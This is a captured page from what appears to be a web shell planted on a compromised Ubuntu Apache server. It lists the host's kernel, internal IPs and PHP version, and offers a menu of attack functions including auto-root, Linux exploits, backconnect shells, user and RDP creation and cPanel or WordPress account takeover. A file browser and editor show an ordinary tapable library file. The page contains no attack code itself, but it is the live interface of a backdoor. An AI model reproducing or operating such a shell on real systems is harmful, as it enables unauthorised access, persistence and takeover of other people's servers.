Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
tapable /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
AsyncParallelBailHook.js
2.3
KB
-rw-rw-r--
AsyncParallelHook.js
877
B
-rw-rw-r--
AsyncSeriesBailHook.js
1.03
KB
-rw-rw-r--
AsyncSeriesHook.js
863
B
-rw-rw-r--
AsyncSeriesLoopHook.js
888
B
-rw-rw-r--
AsyncSeriesWaterfallHook.js
1.23
KB
-rw-rw-r--
Hook.js
3.97
KB
-rw-rw-r--
HookCodeFactory.js
11.67
KB
-rw-rw-r--
HookMap.js
1.48
KB
-rw-rw-r--
MultiHook.js
898
B
-rw-rw-r--
SyncBailHook.js
1.2
KB
-rw-rw-r--
SyncHook.js
1
KB
-rw-rw-r--
SyncLoopHook.js
1.03
KB
-rw-rw-r--
SyncWaterfallHook.js
1.44
KB
-rw-rw-r--
index.js
814
B
-rw-rw-r--
util-browser.js
314
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : MultiHook.js
/* MIT License http://www.opensource.org/licenses/mit-license.php Author Tobias Koppers @sokra */ "use strict"; const Hook = require("./Hook"); class MultiHook { constructor(hooks, name = undefined) { this.hooks = hooks; this.name = name; } tap(options, fn) { for (const hook of this.hooks) { hook.tap(options, fn); } } tapAsync(options, fn) { for (const hook of this.hooks) { hook.tapAsync(options, fn); } } tapPromise(options, fn) { for (const hook of this.hooks) { hook.tapPromise(options, fn); } } isUsed() { for (const hook of this.hooks) { if (hook.isUsed()) return true; } return false; } intercept(interceptor) { for (const hook of this.hooks) { hook.intercept(interceptor); } } withOptions(options) { return new MultiHook( this.hooks.map(h => h.withOptions(options)), this.name ); } } module.exports = MultiHook;
Close